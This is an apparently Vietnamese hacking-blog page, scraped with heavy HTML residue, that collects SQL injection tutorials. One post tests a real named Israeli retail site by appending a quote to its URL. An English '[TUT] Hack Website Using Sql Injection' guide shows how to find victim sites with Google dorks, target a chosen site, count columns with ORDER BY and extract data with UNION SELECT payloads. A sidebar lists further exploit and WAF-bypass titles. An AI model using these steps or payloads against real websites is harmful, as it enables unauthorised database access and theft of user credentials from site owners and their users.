<div class="line number9 index8 alt2" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">Summary: ZeroCMS is a very simple Content Management</code></div>
<div class="line number10 index9 alt1" style="background: none white !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15.399999618530273px; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px 1em !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; white-space: pre !important; width: auto !important;">
<code class="text plain" style="background: none !important; border-bottom-left-radius: 0px !important; border-bottom-right-radius: 0px !important; border-top-left-radius: 0px !important; border-top-right-radius: 0px !important; border: 0px !important; bottom: auto !important; box-sizing: content-box !important; direction: ltr !important; display: inline !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin: 0px !important; outline: 0px !important; overflow: visible !important; padding: 0px !important; position: static !important; right: auto !important; top: auto !important; vertical-align: baseline !important; width: auto !important;">System built using PHP and MySQL.</code></div>

ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability

ZeroCMS 1.0 (article_id) SQL Injection Vulnerability Vendor: Another Awesome Stuff Product web page: http://www.aas9.in/zerocms...

Đầu tiên chúng ta cùng nhìn site này 
<div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: url(http://ceh.vn/@4rum/images/neonglow/highlight_3.png); background-origin: initial; background-position: 0px -1px; background-repeat: repeat-x; background-size: initial; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 1px solid rgb(41, 41, 41); font-family: arial, tahoma; font-size: 13px; line-height: 18.200000762939453px; margin-top: 10px; min-width: 100%;">
<div class="title" style="background-attachment: initial; background-clip: initial; background-image: url(http://ceh.vn/@4rum/images/neonglow/code2.png); background-origin: initial; background-position: 4px 50%; background-repeat: no-repeat; background-size: initial; border-bottom-color: rgb(51, 51, 51); border-bottom-style: solid; border-bottom-width: 1px; font-size: 11px; font-weight: bold; padding: 8px 10px 8px 25px;">
Mã PHP:</div>
<div class="body" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; padding: 5px;">
<div dir="ltr">
<code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 800px; overflow: auto;">http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 </code></div>
</div>
</div>
 Bước 1: Check lỗi 
<div class="codeblock phpcodeblock" style="background-attachment: initial; background-clip: initial; background-image: url(http://ceh.vn/@4rum/images/neonglow/highlight_3.png); background-origin: initial; background-position: 0px -1px; background-repeat: repeat-x; background-size: initial; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 2px; border-top-right-radius: 2px; border: 1px solid rgb(41, 41, 41); font-family: arial, tahoma; font-size: 13px; line-height: 18.200000762939453px; margin-top: 10px; min-width: 100%;">
<div class="title" style="background-attachment: initial; background-clip: initial; background-image: url(http://ceh.vn/@4rum/images/neonglow/code2.png); background-origin: initial; background-position: 4px 50%; background-repeat: no-repeat; background-size: initial; border-bottom-color: rgb(51, 51, 51); border-bottom-style: solid; border-bottom-width: 1px; font-size: 11px; font-weight: bold; padding: 8px 10px 8px 25px;">
Mã PHP:</div>
<div class="body" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; padding: 5px;">
<div dir="ltr">
<code style="display: block; font-family: Monaco, Consolas, Courier, monospace; height: auto; max-height: 800px; overflow: auto;">http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206' </code></div>
</div>
</div>
 
<div style="font-family: arial, tahoma; font-size: 13px; line-height: 18.200000762939453px; text-align: center;">
<a href="http://www.upsieutoc.com/images/2014/06/08/data487c4.png" rel="lightbox" style="text-decoration: none;"><img alt="[Hình: data487c4.png]" border="0" src="http://www.upsieutoc.com/images/2014/06/08/data487c4.png" style="border: none; height: auto; max-width: 100%; outline: 0px;"></a></div>
<div style="font-family: arial, tahoma; font-size: 13px; line-height: 18.200000762939453px; text-align: center;">
Giao diện website có thay đổi. Chứng tỏ site bị lỗi.</div>

Tut SQLi dùng cách Post data

Đầu tiên chúng ta cùng nhìn site này Mã PHP: http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 Bư...

<div style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px; text-align: justify;">
Before we see what  SQL Injection is. We should know what SQL and Database are. Database: Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more. <a href="https://www.blogger.com/null" name="more"></a> Some List of Database are: * DB servers, * MySQL(Open source), * MSSQL, * MS-ACCESS, * Oracle, * Postgre SQL(open source), * SQLite, SQL: Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language. Definition from Complete reference:</div>
<blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name "SQL" is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation "S.Q.L." is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.</blockquote>
 Simple Basic Queries for SQL: Select * from table_name : this statement is used for showing the content of tables including column name. For eg: select * from users; Insert into table_name(column_names,...) values(corresponding values for columns): For inserting data to table. For eg: insert into users(username,userid) values("hack2play","hack"); I will give more detail and query in my next thread about the SQL QUERY. What is SQL Injection? SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database. What an attacker can do? * ByPassing Logins * Accessing secret data * Modifying contents of website * Shutting down the My SQL server Now let's dive into the real procedure for the SQL Injection. Follow my steps. Step 1: Finding Vulnerable Website: Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites. Some Examples: inurl:index.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:pageid= Here is the huge list of Google Dork <a href="http://nightfox.mobi.ws/Dorks.txt" style="font-family: Arial, Verdana; font-size: 13px; line-height: 19px; outline: none; text-align: justify; text-decoration: none;">http://Nightfox.mobi.ws/Dorks.txt</a> How to use? copy one of the above command and paste in the google search engine box. Hit enter. You can get list of web sites. We have to visit the websites one by one for checking the vulnerability. So Start from the first website. <img src="http://darksidegeeks.com/wp-content/uploads/2012/04/ssssss1.png" style="-webkit-box-shadow: none; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: none; box-shadow: none; font-family: Arial, Verdana; font-size: 13px; line-height: 19px; margin: 0px 4px 4px 0px; max-width: 99%; padding: 0px; text-align: justify;"> Note:if you like to hack particular website,then try this: site:www.victimsite.com dork_list_commands for eg: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
site:www.victimsite.com inurl:index.php?id=</blockquote>
 Step 2: Checking the Vulnerability: Now we should check the vulnerability of websites. In order to check the vulnerability ,add the single quotes(') at the end of the url and hit enter. (No space between the number and single quotes) For eg: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
<code>http://www.victimsite.com/index.php?id=2'</code></blockquote>
 If the page remains in same page or showing that page not found or showing some other webpages. Then it is not vulnerable.  If it showing any errors which is related to sql query,then it is vulnerable. Cheers..!! For eg: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1</blockquote>
 Step 3: Finding Number of columns: Now we have found the website is vulnerable. Next step is to find the number of columns in the table.  For that replace the single quotes(') with "order by n" statement.(leave one space between number and order by n statement) Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ". For eg: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
<code>http://www.victimsite.com/index.php?id=2 order by 1</code> <code>http://www.victimsite.com/index.php?id=2 order by 2</code> <code>http://www.victimsite.com/index.php?id=2 order by 3</code> <code>http://www.victimsite.com/index.php?id=2 order by 4</code></blockquote>
 change the number until you get the error as "unknown column" if you get the error while trying the "x"th number,then no of column is "x-1". I mean: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
<code>http://www.victimsite.com/index.php?id=2 order by 1(noerror) http://www.victimsite.com/index.php?id=2 order by 2(noerror) http://www.victimsite.com/index.php?id=2 order by 3(noerror) http://www.victimsite.com/index.php?id=2 order by 4(noerror) http://www.victimsite.com/index.php?id=2 order by 5(noerror) http://www.victimsite.com/index.php?id=2 order by 6(noerror) http://www.victimsite.com/index.php?id=2 order by 7(noerror) http://www.victimsite.com/index.php?id=2 order by 8(error)</code> <code> </code></blockquote>
 so now x=8 , The number of column is x-1 i.e, 7. Sometime the above may not work. At the time add the "--" at the end of the statement. For eg: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
<code>http://www.victimsite.com/index.php?id=2 order by 1--</code></blockquote>
 Step 4: Displaying the Vulnerable columns: Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement. And change the id value to negative(i mean id=-2,must change,but in some website may work without changing). Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,). For eg: if the number of columns is 7 ,then the query is as follow: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
 <code>http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--</code></blockquote>
 If the above method is not working then try this: <blockquote style="border-left-color: rgb(202, 218, 231); border-left-style: solid; border-left-width: 3px; font-family: Arial, Verdana; font-size: 13px; font-style: italic; line-height: 19px; overflow: hidden; padding-left: 9px; text-align: justify;">
<code>http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--</code></blockquote>
 It will show some numbers in the page(it must be less than 'x' value, i mean less than or equl to number of columns).  Like this: <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjh3yJKMLaMM_J-qaYiXAvdNigBIXeettaNIBnNu4gt_KKFunNNcZUGF7UQUxRqzYpY91l2tOxjjlvY2ZDf_X-jDbbIYI0HPK7rbpnQMJ1r0UW-taiuyjP6DOGndiUR6ZyGx3ZFZK1BpAlH/s1600/Sql+Injection+2.JPG" style="-webkit-box-shadow: none; background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: none; box-shadow: none; font-family: Arial, Verdana; font-size: 13px; line-height: 19px; margin: 0px 4px 4px 0px; max-width: 99%; padding: 0px; text-align: justify;">

[TUT] Hack Website Using Sql Injection

Before we see what SQL Injection is. We should know what SQL and Database are. Database: Database is collection of data. In website point ...

Mr.Quay's Blog

Tối ưu hóa tấn công BLIND SQL INJECTION

Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

vBulletin 4.0.x - 4.1.2 (search.php, cat param) - SQL Injection Exploit

Bypass Web Application Firewalls By Simple Trick

Joomla component com_mydyngallery sql injection

Kerio Control 8.3.1 - Blind SQL Injection

[TUT] sql bypass 406 cực cơ bản cho newbie

_SQL Tổng Quan (Mệnh đề WHERE)

Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit

Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL

ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability

Tut SQLi dùng cách Post data

[TUT] Hack Website Using Sql Injection

Xem Nhiều

Blog Archive

Nhận xét mới đăng tải!